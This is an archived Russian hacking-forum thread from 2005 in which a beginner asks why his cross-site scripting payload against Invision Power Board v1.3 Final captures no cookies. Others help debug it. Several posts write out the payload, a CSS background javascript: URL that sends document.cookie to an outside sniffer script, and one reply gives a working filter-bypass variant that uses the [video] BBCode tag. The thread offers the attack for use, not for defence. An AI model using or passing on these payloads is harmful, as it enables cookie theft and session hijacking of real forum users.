Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final (https://forum.antichat.xyz/showthread.php?t=4972)

rsha1988 31.01.2005 18:36

Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final
 
В форуме Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
вставляю :
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
И чето не каких кук в снифере не вижу!
Что я сделал неправильно? :confused:

Del 31.01.2005 19:42

В файнале фильтруются многие символы...
Посмотри Html
Кстати фильтр мешает ещё и спаренные тэги использовать

rsha1988 31.01.2005 19:51

А можно чуть чуть по подробнее?
Я вставляю в сообщение эту фигню:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и она не меняеться не фига когда попадает в тему, так же и остаеться!

Del 31.01.2005 23:34

А к какому тэгу у тебя style в итоге относится?

rsha1988 31.01.2005 23:45

Фиг знает....
Я же всетаки начанающий...

foreva 05.02.2005 18:56

Вообще-то баг работает через определенные теги!
например:
Код:

[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol
Читай внимательнее инфу на сайте!!
http://antichat.ru/txt/IPB/

byte57 05.02.2005 21:33

rsha1988, напиши как парсится в предпросмотре....

rsha1988 07.02.2005 03:01

Цитата:

Сообщение от .::Gh0st::.
rsha1988, напиши как парсится в предпросмотре....

переведи...

BlackPrince 07.02.2005 06:39

Цитата:

Сообщение от rsha1988
переведи...

Скажи, что получается в HTML

rsha1988 08.02.2005 20:14

[video]http://1.ru e=`[/video]` style=display:none;background:none;background:url( javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol - эт и получаеться!


Время: 17:38